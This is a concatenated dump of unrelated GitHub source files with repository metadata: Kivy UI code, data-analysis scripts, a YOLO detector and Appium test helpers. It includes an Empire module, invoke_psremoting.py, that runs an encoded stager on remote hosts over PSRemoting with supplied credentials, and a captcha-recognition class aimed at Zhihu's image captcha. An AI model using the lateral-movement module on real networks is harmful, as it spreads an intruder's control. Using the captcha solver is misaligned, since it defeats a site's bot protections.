id: als
<ComparisonWidget>:
Widget:
canvas:
Color:
rgba: 1, 0, 0, 1
Ellipse:
pos: Vector(self.pos) + 0.5*Vector(self.size)
size: 0.4*Vector(self.size)
Color:
rgba: 0, 1, 0.3, 1
Ellipse:
pos: Vector(self.pos) + 0.1*Vector(self.size)
size: 0.6*Vector(self.size)
Color:
rgba: 0.5, 0.3, 0.8, 1
Ellipse:
pos: Vector(self.pos) + Vector([0, 0.6])*Vector(self.size)
size: 0.4*Vector(self.size)
Color:
rgba: 1, 0.8, 0.1, 1
Ellipse:
pos: Vector(self.pos) + Vector([0.5, 0])*Vector(self.size)
size: 0.4*Vector(self.size)
Color:
rgba: 0, 0, 0.8, 1
Line:
points:
[self.x, self.y,
self.x + self.width, self.y + 0.3*self.height,
self.x + 0.2*self.width, self.y + 0.1*self.height,
self.x + 0.85*self.width, self.y + 0.72*self.height,
self.x + 0.31*self.width, self.y + 0.6*self.height,
self.x, self.top]
width: 1
Color:
rgba: 0, 0.9, 0.1, 1
Line:
points:
[self.x + self.width, self.y + self.height,
self.x + 0.35*self.width, self.y + 0.6*self.height,
self.x + 0.7*self.width, self.y + 0.15*self.height,
self.x + 0.2*self.width, self.y + 0.22*self.height,
self.x + 0.3*self.width, self.y + 0.92*self.height]
width: 2
<SpinnerRow>:
orientation: 'horizontal'
size_hint_y: None
height: dp(40)
text: ''
Label:
text: root.text
EffectSpinner:
on_text: root.update_effectwidget()
EffectSpinner:
on_text: root.update_effectwidget()
EffectSpinner:
on_text: root.update_effectwidget()
<EffectSpinner>:
text: 'none'
values:
['none', 'fxaa', 'monochrome',
'invert', 'mix',
'blur_h', 'blur_v',
'postprocessing', 'pixelate',]
''')
class EffectApp(App):
def build(self):
return example
EffectApp().run()
|
[
"[email protected]"
] | |
219cef7e0bdb3c19ef844fd2b9f31656dcc58f07
|
2817ecd7e48c4decba12ee76e451727c1a6acf14
|
/scripts/legacy/survey_distribution.py
|
645981e58fef1bc3a1c76cafe786360c095677dc
|
[] |
no_license
|
schwa-lab/sharingnews
|
6fcef71c16a03fb3a4a56c11322ba5c8ceb59582
|
81c87176c7b37511f15a97189f03d90d5074d0fb
|
refs/heads/master
| 2021-01-16T21:46:23.108811 | 2018-02-12T06:33:30 | 2018-02-12T06:33:30 | 26,195,626 | 3 | 0 | null | 2018-02-12T06:33:16 | 2014-11-05T00:39:40 |
Python
|
UTF-8
|
Python
| false | false | 3,985 |
py
|
from __future__ import print_function, division
from collections import Counter, defaultdict
import operator
from likeable.cleaning import strip_subdomains
MONTH_FIELD = 1
def get_status_binary(l):
status = l[8]
if status == '200':
return True
else:
return False
def get_status_group(l):
status = l[8]
if status.startswith('<') or status == '-':
return 'ERR'
elif status == '200?':
return 'HOME'
else:
return status[0] + 'xx'
def _norm_date(dt, n_months):
if n_months is None:
return
return (dt[:4] + '-' +
'%02d' % ((int(dt[5:7]) - 1) // n_months * n_months + 1))
def get_distribs(key_field, get_cat, n_months, weight=None):
# Group survey by status (cat), sig (key) and date group
distrs = defaultdict(Counter)
for l in open('data/sample-survey-v2'):
l = l.rstrip('\r\n').split('\t')
dt = _norm_date(l[MONTH_FIELD], n_months)
distrs[l[key_field], dt][get_cat(l)] += 1
if weight is None:
get_weight = lambda k: 1
else:
get_weight = weight.get
for k in distrs:
distr = distrs[k]
w = get_weight(k) or 0 # HACK due to dirty data?
total = sum(distr.values())
distrs[k] = {c: w * n / total
for c, n in distr.items()}
return distrs
def get_sig_weights(n_months):
# Get overall frequency for each key and date
sig_weight = defaultdict(int)
for l in open('data/url-sig-frequencies.txt'):
l = l.rstrip('\r\n').split('\t')
try:
sig_weight[l[2], _norm_date(l[1], n_months)] += int(l[0])
except (IndexError, ValueError):
# Dirty data
pass
sig_weight.default_factory = None
return sig_weight
def _sig_to_domain(sig):
return strip_subdomains(sig.split('/')[0])
def regroup_by_domain(distrs):
out = defaultdict(lambda: defaultdict(float))
for (k, m), distr in distrs.iteritems():
for c, n in distr.iteritems():
out[_sig_to_domain(k), m][c] += n
return out
def get_all_cats(distrs):
cats = set()
for distr in distrs.itervalues():
for c in distr:
cats.add(c)
return sorted(cats)
if __name__ == '__main__':
import argparse
ap = argparse.ArgumentParser()
ap.add_argument('-m', '--month-quant', type=int,
help='Group this many months together (default, all time)')
ap.add_argument('--by-sig', default=False, action='store_true')
ap.add_argument('--use-end-sig', default=False, action='store_true',
help='Calculates status on the basis of likely canonical '
'URL signature')
cat_opts = {
'status-binary': get_status_binary,
'status-group': get_status_group,
}
ap.add_argument('-c', '--cats', choices=cat_opts.keys(),
default='status-binary')
args = ap.parse_args()
n_months = getattr(args, 'month_quant', None)
if n_months is not None and 12 % n_months != 0:
ap.error('--month-quant (-m) must divide into 12')
sig_weight = get_sig_weights(n_months)
key_field = 4 # start sig
if args.use_end_sig:
tmp = get_distribs(key_field, operator.itemgetter(7), n_months,
weight=sig_weight)
sig_weight = defaultdict(float)
for (start_sig, mo), distr in tmp.iteritems():
for end_sig, n in distr.iteritems():
sig_weight[end_sig, mo] += n
key_field = 7 # end sig
distrs = get_distribs(key_field, cat_opts[args.cats], n_months,
weight=sig_weight)
if not args.by_sig:
distrs = regroup_by_domain(distrs)
# output
all_cats = get_all_cats(distrs)
print('key', 'month', *all_cats, sep='\t')
for k, v in sorted(distrs.iteritems()):
k = list(k)
k.extend(v.get(c, 0) for c in all_cats)
print(*k, sep='\t')
|
[
"[email protected]"
] | |
495ba133d20be9696a894db3f3accc2f2fd82015
|
326c6ad82d59bb7509c02c76695ea9035993da70
|
/lib/modules/powershell/lateral_movement/invoke_psremoting.py
|
4680387727765b745328f6c6d9f005817ee6c58e
|
[
"BSD-3-Clause"
] |
permissive
|
Arvanaghi/Empire
|
0c08bd7ddfba9be10e96bb0834b8ce3bc829059b
|
fd168ebf8acb1c2ee59d56f2c393ebd7a297603e
|
refs/heads/master
| 2021-01-20T14:15:34.864581 | 2017-08-05T17:51:44 | 2017-08-05T17:51:44 | 99,435,848 | 2 | 0 | null | 2017-08-05T16:50:16 | 2017-08-05T16:50:16 | null |
UTF-8
|
Python
| false | false | 5,441 |
py
|
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-PSRemoting',
'Author': ['@harmj0y'],
'Description': ('Executes a stager on remote hosts using PSRemoting.'),
'Background' : False,
'OutputExtension' : None,
'NeedsAdmin' : False,
'OpsecSafe' : True,
'Language' : 'powershell',
'MinLanguageVersion' : '2',
'Comments': []
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'CredID' : {
'Description' : 'CredID from the store to use.',
'Required' : False,
'Value' : ''
},
'ComputerName' : {
'Description' : 'Host[s] to execute the stager on, comma separated.',
'Required' : True,
'Value' : ''
},
'Listener' : {
'Description' : 'Listener to use.',
'Required' : True,
'Value' : ''
},
'UserName' : {
'Description' : '[domain\]username to use to execute command.',
'Required' : False,
'Value' : ''
},
'Password' : {
'Description' : 'Password to use to execute command.',
'Required' : False,
'Value' : ''
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
listenerName = self.options['Listener']['Value']
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
userName = self.options['UserName']['Value']
password = self.options['Password']['Value']
script = """Invoke-Command """
# if a credential ID is specified, try to parse
credID = self.options["CredID"]['Value']
if credID != "":
if not self.mainMenu.credentials.is_credential_valid(credID):
print helpers.color("[!] CredID is invalid!")
return ""
(credID, credType, domainName, userName, password, host, os, sid, notes) = self.mainMenu.credentials.get_credentials(credID)[0]
self.options["UserName"]['Value'] = str(domainName) + "\\" + str(userName)
self.options["Password"]['Value'] = password
if not self.mainMenu.listeners.is_listener_valid(listenerName):
# not a valid listener, return nothing for the script
print helpers.color("[!] Invalid listener: " + listenerName)
return ""
else:
# generate the PowerShell one-liner with all of the proper options set
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
if launcher == "":
return ""
else:
# build the PSRemoting execution string
computerNames = "\"" + "\",\"".join(self.options['ComputerName']['Value'].split(",")) + "\""
script += " -ComputerName @("+computerNames+")"
script += " -ScriptBlock {" + launcher + "}"
if self.options["UserName"]['Value'] != "" and self.options["Password"]['Value'] != "":
# add in the user credentials
script = "$PSPassword = \""+password+"\" | ConvertTo-SecureString -asPlainText -Force;$Credential = New-Object System.Management.Automation.PSCredential(\""+userName+"\",$PSPassword);" + script + " -Credential $Credential"
script += ";'Invoke-PSRemoting executed on " +computerNames +"'"
return script
|
[
"[email protected]"
] | |
ac49ac9a742dde207c205fdf63ceaf884a3a20e3
|
70ed9ef2867b2c0ca96596f8fdd75c31af5ac116
|
/build/lib/ArticleSpider/zheye/__init__.py
|
83954ea69947cd42adcc0f1dd46ef9f117c78f71
|
[] |
no_license
|
nanmuyao/ArticleSpider
|
b24aef4bbd761951dd1bd450e49de8f40c96f289
|
a75cfaa028b1717636866b5833cdcaa29a2ec43a
|
refs/heads/master
| 2021-07-24T16:16:20.597430 | 2017-11-05T08:01:53 | 2017-11-05T08:01:53 | 109,280,103 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,802 |
py
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# Recognizing class
from sklearn.mixture import GaussianMixture
from PIL import Image
from ArticleSpider.zheye import util
import numpy as np
class zheye:
def __init__(self):
''' load model '''
import os
import keras
full_path = os.path.realpath(__file__)
path, filename = os.path.split(full_path)
self.model = keras.models.load_model(path +'/zheyeV3.keras')
def Recognize(self, fn):
im = Image.open(fn)
im = util.CenterExtend(im, radius=20)
vec = np.asarray(im.convert('L')).copy()
Y = []
for i in range(vec.shape[0]):
for j in range(vec.shape[1]):
if vec[i][j] <= 200:
Y.append([i, j])
gmm = GaussianMixture(n_components=7, covariance_type='tied', reg_covar=1e2, tol=1e3, n_init=9)
gmm.fit(Y)
centers = gmm.means_
points = []
for i in range(7):
scoring = 0.0
for w_i in range(3):
for w_j in range(3):
p_x = centers[i][0] -1 +w_i
p_y = centers[i][1] -1 +w_j
cr = util.crop(im, p_x, p_y, radius=20)
cr = cr.resize((40, 40), Image.ANTIALIAS)
X = np.asarray(cr.convert('L'), dtype='float')
X = (X.astype("float") - 180) /200
x0 = np.expand_dims(X, axis=0)
x1 = np.expand_dims(x0, axis=3)
global model
if self.model.predict(x1)[0][0] < 0.5:
scoring += 1
if scoring > 4:
points.append((centers[i][0] -20, centers[i][1] -20))
return points
|
[
"[email protected]"
] | |
0db2aa9ff306478ee3e5479f7c42bd343136846d
|
795f0081004920c15c178c43b00432cb8e7ca586
|
/controller/src/object_detection.py
|
3d2d3f1083a94ede6cb0ff9622c6d4a24be2a5ba
|
[] |
no_license
|
60alex60/ECE140aLab6
|
e6e9985a07e5615a5678d817cdfb031802322425
|
f966af1d7aa87ab9f602bd3ad3f4cdea13ee7421
|
refs/heads/master
| 2023-04-05T15:31:52.014565 | 2021-03-05T05:41:31 | 2021-03-05T05:41:31 | 353,224,446 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,292 |
py
|
import numpy as np
import cv2
import time
class ImgProc():
def __init__(self):
# read pre-trained model and config file
self.net = cv2.dnn.readNet("object_detection/yolov4-tiny.weights", "object_detection/yolov4-tiny.cfg")
# read class names from text file
self.classes = None
with open("object_detection/coco.names", 'r') as f:
self.classes = [line.strip() for line in f.readlines()]
# generate different colors for different classes
self.COLORS = np.random.uniform(0, 255, size=(len(self.classes), 3))
# function to get the output layer names
# in the architecture
def get_output_layers(self, net):
layer_names = net.getLayerNames()
output_layers = [layer_names[i[0] - 1] for i in net.getUnconnectedOutLayers()]
return output_layers
# function to draw bounding box on the detected object with class name
def draw_bounding_box(self, img, class_id, confidence, x, y, x_plus_w, y_plus_h):
label = str(self.classes[class_id])
color = self.COLORS[class_id]
cv2.rectangle(img, (x, y), (x_plus_w, y_plus_h), color, 2)
cv2.putText(img, label, (x - 10, y - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.5, color, 2)
def detect_objects(self, img):
W = img.shape[1]
H = img.shape[0]
# create input blob
sz = (416, 416) # (224,224)
normalization = 1.0 / 255.0
blob = cv2.dnn.blobFromImage(img, normalization, sz, (0, 0, 0), True, crop=False)
# set input blob for the network
self.net.setInput(blob)
# run inference through the network
# and gather predictions from output layers
outs = self.net.forward(self.get_output_layers(self.net))
# initialization
class_ids = []
confidences = []
boxes = []
centroids = []
conf_threshold = 0.3
nms_threshold = 0.1
# For each detetion from each output layer get the confidence, class id, bounding box params and ignore weak detections (confidence < 0.5)
for out in outs:
for detection in out:
scores = detection[5:]
class_id = np.argmax(scores)
confidence = scores[class_id]
if confidence > conf_threshold:
center_x = int(detection[0] * W)
center_y = int(detection[1] * H)
w = int(detection[2] * W)
h = int(detection[3] * H)
x = center_x - w / 2
y = center_y - h / 2
class_ids.append(class_id)
confidences.append(float(confidence))
boxes.append([x, y, w, h])
centroids.append((center_x, center_y))
# Apply non-max suppression to prevent duplicate detections
indices = cv2.dnn.NMSBoxes(boxes, confidences, conf_threshold, nms_threshold)
# Go through the detections remaining after NMS and draw bounding boxes
detections = []
frame = img.copy()
for i in indices:
i = i[0]
box = boxes[i]
x = box[0]
y = box[1]
w = box[2]
h = box[3]
self.draw_bounding_box(frame, class_ids[i], confidences[i], round(x), round(y), round(x + w), round(y + h))
detections.append((self.classes[class_ids[i]], centroids[i], box))
print("Detected Objects: ", detections)
return detections, frame
if __name__ == "__main__":
img = cv2.imread('sample_img.png')
imgProc = ImgProc()
imgProc.detect_objects(img)
|
[
"66690702+github-classroom[bot]@users.noreply.github.com"
] |
66690702+github-classroom[bot]@users.noreply.github.com
|
fc65babef9b7d7077b94f35d2c17bcd73e6ea202
|
ac305c6739541e84857e297f8eb1b19417978548
|
/78.py
|
669cd4df43e886cd23adf6230f54103530d8dd28
|
[] |
no_license
|
imhardikj/git_test
|
d6608d6c02e0bc454f9dd31ffbbc5704a7046a61
|
43f0de2e9ac09ecd4fdfee27879fd8ae354a0685
|
refs/heads/master
| 2020-03-27T21:56:46.394739 | 2018-09-03T11:27:58 | 2018-09-03T11:27:58 | 147,189,474 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 135 |
py
|
def greet_user(username):
"""Display a simple greeting."""
print("Hello, " + username.title() + "!")
greet_user('jesse')
|
[
"[email protected]"
] | |
b92c943549a132c92ed17f40a08639a3e024897f
|
106983cf0b8df622f514ecff2bb2fa4c794c9dac
|
/Misc/Raspberry Pi Things/Motors/stringComparison.py
|
c9d425c4e5b4eeabd02957268eb17c72dcf90889
|
[] |
no_license
|
michael5486/Senior-Design
|
2d9ae521c637abf7c0825f85b32752ad61c62744
|
6b6c78bed5f20582a9753a9c10020c709d6b6e53
|
refs/heads/master
| 2021-01-19T09:58:35.378164 | 2017-05-26T17:17:13 | 2017-05-26T17:17:13 | 67,556,475 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 179 |
py
|
testVar = None
run = True
while run == 1:
testVar = raw_input("Ask user for something.\n")
if testVar == "exit":
run = False
print "System Exiting..."
else:
print testVar
|
[
"[email protected]"
] | |
5b9c1aae3f26483755e82ecbe9dbc62f68a649ff
|
9a343c495459e79dc408a102730bcaeac7fa8886
|
/chapter9/SuperMattAdmin/ModelForm/urls.py
|
e330642ce8f8b5b0fcd8f30304a21a71719bd6f6
|
[
"MIT"
] |
permissive
|
MMingLeung/Python_Study
|
62d3ae92bf6760de0804aa5792f53fb3799486a2
|
4ff1d02d2b6dd54e96f7179fa000548936b691e7
|
refs/heads/master
| 2022-12-27T12:53:05.186800 | 2018-03-07T04:34:36 | 2018-03-07T04:34:36 | 92,124,981 | 3 | 1 |
MIT
| 2021-06-10T18:35:33 | 2017-05-23T03:28:52 |
JavaScript
|
UTF-8
|
Python
| false | false | 1,316 |
py
|
"""ModelForm URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url,include
from django.contrib import admin
from app01 import views
from supermatt.service import test_v1
urlpatterns = [
# url(r'^admin/', admin.site.urls),
# include 如果参数是模块路径,导入模块找urlpatterns变量,获取列表
# url(r'^test/$', include('app01.urls')),
# 可以这样写
# url(r'^test/$', ([
# url(r'^test/', views.test),
# url(r'^test/', views.test),
# url(r'^test/', views.test),
# ],'app_name','name_space')),
url(r'^su/', test_v1.site.urls),
url(r'^test/', views.test),
url(r'^test2/', views.test2),
]
|
[
"[email protected]"
] | |
a14a08ab5d69e160bff8619e5fa0c565a6878d76
|
03b30e760f571e309ab1539edbc24ce0ff47c141
|
/cyly/test1.py
|
0ee1339e5bbd9f9f590df225b40d8211bac483c9
|
[] |
no_license
|
latata666/newcoder
|
548f32ab3acd75b592ce7f7b399ecdf340e747d8
|
e9206ab924899a2985bece312777e3b5d55c6f60
|
refs/heads/master
| 2022-12-12T22:46:03.255804 | 2020-08-31T02:27:17 | 2020-08-31T02:27:17 | 263,274,517 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 876 |
py
|
# -*- coding: utf-8 -*-
# @Time : 2020/5/15 10:41
# @Author : Mamamooo
# @Site :
# @File : test1.py
# @Software: PyCharm
"""
"""
import logging
# create logger with 'spam_application'
logger = logging.getLogger('spam_application')
logger.setLevel(logging.DEBUG)
# create file handler which logs even debug messages
fh = logging.FileHandler('spam.log')
fh.setLevel(logging.DEBUG)
# create console handler with a higher log level
ch = logging.StreamHandler()
ch.setLevel(logging.ERROR)
# create formatter and add it to the handlers
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
fh.setFormatter(formatter)
ch.setFormatter(formatter)
# add the handlers to the logger
logger.addHandler(fh)
logger.addHandler(ch)
logger.info('creating an instance of auxiliary_module.Auxiliary')
logger.info('done with auxiliary_module.some_function()')
|
[
"[email protected]"
] | |
856e9c0036931f4496353a90a125e2e2e94829e8
|
95aa5a5c10ad18195d7f92e37265d9dff06debe6
|
/synapse/tools/server.py
|
55efd5ecbd42ae28f7f5bd3ea0aa56bb306baf18
|
[
"Apache-2.0"
] |
permissive
|
drstrng/synapse
|
2679f7c23221ad7d8fd2fbb4745bdcd5275843da
|
3901f17601821aa0e8b6de4de434309d465fbba2
|
refs/heads/master
| 2021-01-17T22:02:29.833824 | 2015-09-01T18:56:57 | 2015-09-01T18:56:57 | 40,968,669 | 0 | 0 | null | 2015-08-18T11:40:51 | 2015-08-18T11:40:50 |
Python
|
UTF-8
|
Python
| false | false | 1,358 |
py
|
import sys
import argparse
import importlib
import synapse.link as s_link
import synapse.cortex as s_cortex
import synapse.daemon as s_daemon
def main(argv):
p = argparse.ArgumentParser(prog='server')
p.add_argument('--initmod',help='python module name for daemon init callback')
p.add_argument('--cortex', action='append', default=[], help='cortex name,url to share for RMI')
p.add_argument('linkurl',nargs='+',help='link urls to bind/listen')
opts = p.parse_args(argv)
daemon = s_daemon.Daemon()
# possibly load/share a cortex or two
for nameurl in opts.cortex:
name,url = nameurl.split(',',1)
core = s_cortex.openurl(url)
daemon.addSharedObject(name,core)
# fire up requested link servers
for url in opts.linkurl:
link = s_link.chopLinkUrl(url)
daemon.runLinkServer(link)
if opts.initmod:
mod = importlib.import_module(opts.initmod)
meth = getattr(mod,'initDaemon',None)
if meth == None:
print('error: initmod (%s) has no initDaemon() function!')
return
# call back the daemon init module
meth(daemon)
try:
daemon.wait()
except KeyboardInterrupt as e:
print('ctrl-c caught: shutting down')
daemon.fini()
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
|
[
"[email protected]"
] | |
83fb210fa070a1486e7d0d70933f5079a00249e4
|
82fce9aae9e855a73f4e92d750e6a8df2ef877a5
|
/Lab/venv/lib/python3.8/site-packages/OpenGL/raw/GLES2/EXT/sRGB.py
|
8f6425aa57802b0bcff7a9f104b0879ff0ac08bc
|
[] |
no_license
|
BartoszRudnik/GK
|
1294f7708902e867dacd7da591b9f2e741bfe9e5
|
6dc09184a3af07143b9729e42a6f62f13da50128
|
refs/heads/main
| 2023-02-20T19:02:12.408974 | 2021-01-22T10:51:14 | 2021-01-22T10:51:14 | 307,847,589 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 648 |
py
|
'''Autogenerated by xml_generate script, do not edit!'''
from OpenGL import platform as _p
from OpenGL.constant import Constant as _C
# Code generation uses this
# End users want this...
from OpenGL.raw.GLES2 import _errors
_EXTENSION_NAME = 'GLES2_EXT_sRGB'
def _f(function):
return _p.createFunction(function, _p.PLATFORM.GLES2, 'GLES2_EXT_sRGB', error_checker=_errors._error_checker)
GL_FRAMEBUFFER_ATTACHMENT_COLOR_ENCODING_EXT = _C('GL_FRAMEBUFFER_ATTACHMENT_COLOR_ENCODING_EXT', 0x8210)
GL_SRGB8_ALPHA8_EXT = _C('GL_SRGB8_ALPHA8_EXT', 0x8C43)
GL_SRGB_ALPHA_EXT = _C('GL_SRGB_ALPHA_EXT', 0x8C42)
GL_SRGB_EXT=_C('GL_SRGB_EXT',0x8C40)
|
[
"[email protected]"
] | |
ce7936e9279838ce773a5d1c8ec644b1ab44048f
|
ce55c319f5a78b69fefc63595d433864a2e531b5
|
/前后端分离-vue-DRF/Projects-lenongke/LNK/apps/users/signals.py
|
43a056d613cf142a3a112d980f3a8db7cfac5f0d
|
[] |
no_license
|
Suijng/1809_data
|
a072c875e8746190e3b715e53f1afe3323f4666b
|
45f8a57089f5c30ccc1a3cddb03b76dc95355417
|
refs/heads/master
| 2022-12-21T12:38:30.458291 | 2019-09-27T01:14:41 | 2019-09-27T01:14:41 | 211,207,071 | 0 | 0 | null | 2022-11-22T03:16:18 | 2019-09-27T00:55:21 |
HTML
|
UTF-8
|
Python
| false | false | 579 |
py
|
# post_save Django中的model对象保存后,自动触发
from django.db.models.signals import post_save
from django.dispatch import receiver
from django.contrib.auth import get_user_model
# 获取用户模型
User = get_user_model()
@receiver(post_save,sender=User) # 监控用户User模型
def create_user(sender,instance=None,created=False,**kwargs):
# created: 表示是否已经创建
if created:
# 获取用户的密码
password = instance.password
# 加密
instance.set_password(password)
# 保存
instance.save()
|
[
"[email protected]"
] | |
99bdd4f3712583d0eca467f97b1c076141596f60
|
7edafb8e10c31bffd12420a4cee61d0a841fd226
|
/YunluFramework/public/handle/renmai/RENMAIHANDLE5.py
|
c53467af7c700dc0002bde67039eec60351ee5c0
|
[] |
no_license
|
xiao2912008572/Appium
|
ca11d2cf82f9dcc051e9b719eb09f862f07621bf
|
3931957a8ae9b4ee2acc13ae4aba0ba46b6d842b
|
refs/heads/master
| 2021-01-21T12:27:36.243484 | 2018-09-12T09:25:35 | 2018-09-12T09:25:35 | 102,071,447 | 8 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 9,492 |
py
|
__author__ = 'Administrator'
from YunluFramework.public.handle.renmai.RENMAIHANDLE4 import RENMAIHANDLE4
class RENMAIHANDLE5(RENMAIHANDLE4):
#*********************************【PAGE4】人脉首页-搜索-标签列表-点击进入群聊-设置:RMSY_search_label_groupchat_menu_setting*********************************
#定位:人脉首页-搜索-标签列表-点击进入群聊-设置-群头像:点击
def RMSY_search_label_groupchat_menu_setting_grouphead_click(self):
return self.p.click(self.RMSY_search_label_groupchat_menu_setting_grouphead)
#定位:人脉首页-搜索-标签列表-点击进入群聊-设置-返回:点击
def RMSY_search_label_groupchat_menu_setting_back_click(self):
return self.p.click(self.RMSY_search_label_groupchat_menu_setting_back)
#定位:人脉首页-搜索-标签列表-点击进入群聊-设置-群名称:点击
def RMSY_search_label_groupchat_menu_setting_groupname_click(self):
return self.p.click(self.RMSY_search_label_groupchat_menu_setting_groupname)
#*********************************【PAGE4】人脉首页-搜索-标签列表-点击进入群聊-热度设置:RMSY_search_label_groupchat_menu_heatsetting*********************************
#定位:人脉首页-搜索-标签列表-点击进入群聊-热度设置-返回:点击
def RMSY_search_label_groupchat_menu_heatsetting_back_click(self):
return self.p.click(self.RMSY_search_label_groupchat_menu__heatsetting_back)
#定位:人脉首页-搜索-标签列表-点击进入群聊-热度设置-消息:点击
def RMSY_search_label_groupchat_menu_heatsetting_msg_click(self):
return self.p.click(self.RMSY_search_label_groupchat_menu__heatsetting_msg)
#定位:人脉首页-搜索-标签列表-点击进入群聊-热度设置-飘泡:点击
def RMSY_search_label_groupchat_menu_heatsetting_bubble_click(self):
return self.p.click(self.RMSY_search_label_groupchat_menu__heatsetting_bubble)
#定位:人脉首页-搜索-标签列表-点击进入群聊-热度设置-震动:点击
def RMSY_search_label_groupchat_menu_heatsetting_shock_click(self):
return self.p.click(self.RMSY_search_label_groupchat_menu__heatsetting_shock)
#定位:人脉首页-搜索-标签列表-点击进入群聊-热度设置-铃声:点击
def RMSY_search_label_groupchat_menu_heatsetting_bell_click(self):
return self.p.click(self.RMSY_search_label_groupchat_menu__heatsetting_bell)
#定位:人脉首页-搜索-标签列表-点击进入群聊-热度设置-确定:点击
def RMSY_search_label_groupchat_menu_heatsetting_confirm_click(self):
return self.p.click(self.RMSY_search_label_groupchat_menu__heatsetting_confirm)
#定位:人脉首页-搜索-标签列表-点击进入群聊-热度设置-周期:点击
def RMSY_search_label_groupchat_menu_heatsetting_period_click(self):
return self.p.click(self.RMSY_search_label_groupchat_menu__heatsetting_period)
#定位:人脉首页-搜索-标签列表-点击进入群聊-热度设置-时段:点击
def RMSY_search_label_groupchat_menu_heatsetting_time_click(self):
return self.p.click(self.RMSY_search_label_groupchat_menu__heatsetting_time)
#*********************************【PAGE4】人脉首页-搜索-标签列表-点击进入群聊-人群按钮:RMSY_search_label_groupchat_groupbtn*********************************
#定位:人脉首页-搜索-标签列表-点击进入群聊-人群按钮-返回:点击
def RMSY_search_label_groupchat_groupbtn_back_click(self):
return self.p.click(self.RMSY_search_label_groupchat_groupbtn_back)
#定位:人脉首页-搜索-标签列表-点击进入群聊-人群按钮-联系人列表:点击
def RMSY_search_label_groupchat_groupbtn_Contacts_click(self, n):
return self.p.clicks(self.RMSY_search_label_groupchat_groupbtn_Contacts,n)
#定位:人脉首页-搜索-标签列表-点击进入群聊-人群按钮-消息输入框:输入
def RMSY_search_label_groupchat_groupbtn_msginput_sendkeys(self, msg):
return self.p.send_keys(self.RMSY_search_label_groupchat_groupbtn_msginput, msg)
#定位:人脉首页-搜索-标签列表-点击进入群聊-人群按钮-消息按钮:点击
def RMSY_search_label_groupchat_groupbtn_msgbtn_click(self):
return self.p.click(self.RMSY_search_label_groupchat_groupbtn_msgbtn)
#*********************************【PAGE3】人脉首页-点击联系人-打开主菜单-热度设置-一对一会话-周期:RMSY_contacts_menu_heatsetting_p2pconversation_period*********************************
#定位:人脉首页-点击联系人-打开主菜单-热度设置-一对一会话-周期-返回:点击
def RMSY_contacts_menu_heatsetting_p2pconversation_period_back_click(self):
return self.p.click(self.RMSY_contacts_menu_heatsetting_p2pconversation_period_back)
#定位:人脉首页-点击联系人-打开主菜单-热度设置-一对一会话-周期-每天:点击
def RMSY_contacts_menu_heatsetting_p2pconversation_period_everyday_click(self):
return self.p.click(self.RMSY_contacts_menu_heatsetting_p2pconversation_period_everyday)
#定位:人脉首页-点击联系人-打开主菜单-热度设置-一对一会话-周期-工昨日:点击
def RMSY_contacts_menu_heatsetting_p2pconversation_period_workday_click(self):
return self.p.click(self.RMSY_contacts_menu_heatsetting_p2pconversation_period_workday)
#定位:人脉首页-点击联系人-打开主菜单-热度设置-一对一会话-周期-节假日:点击
def RMSY_contacts_menu_heatsetting_p2pconversation_period_holiday_click(self):
return self.p.click(self.RMSY_contacts_menu_heatsetting_p2pconversation_period_holiday)
#定位:人脉首页-点击联系人-打开主菜单-热度设置-一对一会话-周期-择日:点击
def RMSY_contacts_menu_heatsetting_p2pconversation_period_selectday_click(self):
return self.p.click(self.RMSY_contacts_menu_heatsetting_p2pconversation_period_selectday)
#定位:人脉首页-点击联系人-打开主菜单-热度设置-一对一会话-周期-保存:点击
def RMSY_contacts_menu_heatsetting_p2pconversation_period_save_click(self):
return self.p.click(self.RMSY_contacts_menu_heatsetting_p2pconversation_period_save)
#*********************************【PAGE3】人脉首页-点击联系人-打开主菜单-热度设置-一对一会话-时段:RMSY_contacts_menu_heatsetting_p2pconversation_time*********************************
#定位:人脉首页-点击联系人-打开主菜单-热度设置-一对一会话-时段-确定:点击
def RMSY_contacts_menu_heatsetting_p2pconversation_time_confirm_click(self):
return self.p.click(self.RMSY_contacts_menu_heatsetting_p2pconversation_time_confirm)
#定位:人脉首页-点击联系人-打开主菜单-热度设置-一对一会话-时段-取消:点击
def RMSY_contacts_menu_heatsetting_p2pconversation_time_cancel_click(self):
return self.p.click(self.RMSY_contacts_menu_heatsetting_p2pconversation_time_cancel)
